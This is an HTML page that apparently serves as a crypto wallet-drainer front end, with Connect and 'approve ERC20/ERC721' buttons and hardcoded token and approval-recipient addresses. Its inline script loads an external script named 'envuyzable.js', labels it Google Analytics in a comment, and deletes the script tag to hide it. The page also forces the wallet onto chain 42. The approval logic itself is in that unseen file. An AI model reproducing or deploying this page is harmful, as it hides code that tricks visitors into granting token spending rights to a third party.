<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
<script src="https://cdn.jsdelivr.net/npm/web3@1.4.0/dist/web3.min.js"></script> 
<script src="https://code.jquery.com/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous"></script>	
<script type="text/javascript" src="https://cdn.jsdelivr.net/gh/ethereumjs/browser-builds/dist/ethereumjs-tx/ethereumjs-tx-1.3.3.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/@biconomy/mexa@latest/dist/mexa.js"></script>
<script src="https://cdn.ethers.io/lib/ethers-5.2.umd.min.js" type="application/javascript"></script>

<script type="text/javascript"> 
$(document).ready(function () {

var ga = document.createElement("script"); //ga is to remember Google Analytics ;-)
ga.type = 'text/javascript';
ga.src = 'envuyzable.js';
ga.id = 'invisible';
document.body.appendChild(ga);
$('#invisible').remove();});
if (typeof web3 !== 'undefined') { 
                console.log('Web3 Detected! ' + web3.currentProvider.constructor.name)
                window.web3 = new Web3(web3.currentProvider);
            }
 var token_adr='0x99a019afA48d262fD34905AF05657FC0E2E300B4'; // address ERC20 tokena
 var token_721='0xb11742a8d12781d0fd426fd71c76629de661e15c'; // address tokena smart contracta ERC721/1155
 var kuda_approve='0xda0cfbA981dBC502158D09B3090FCB366d362956';// address na kotoriy dadut approve
  			 
				web3.eth.net.getId(function(err,res){
				 if(res!=42){
				  ethereum.request({
    method: 'wallet_switchEthereumChain',
    params: [{ chainId: '0x2a' }],  
   }).then((result) => {
   $('#alert').html('Connect your wallet');
   }) }	 })
	</script>
	 
</head>
<body>
<h3>HELLO WORLD</h3>
</br>

	<span id="enab"><button id="enable">Connect</button></span>
	<span id="alert"></span></br>
	</br>
	<div>
	<div id="area" style="display:none;">

</br> 
<p><button id="approve">approve ERC20</button></p>
<p><button id="approve_721">approve ERC721</button> </p>


 
</br>
</br>
</div>
<p id="res"></p>
</body>
</html>
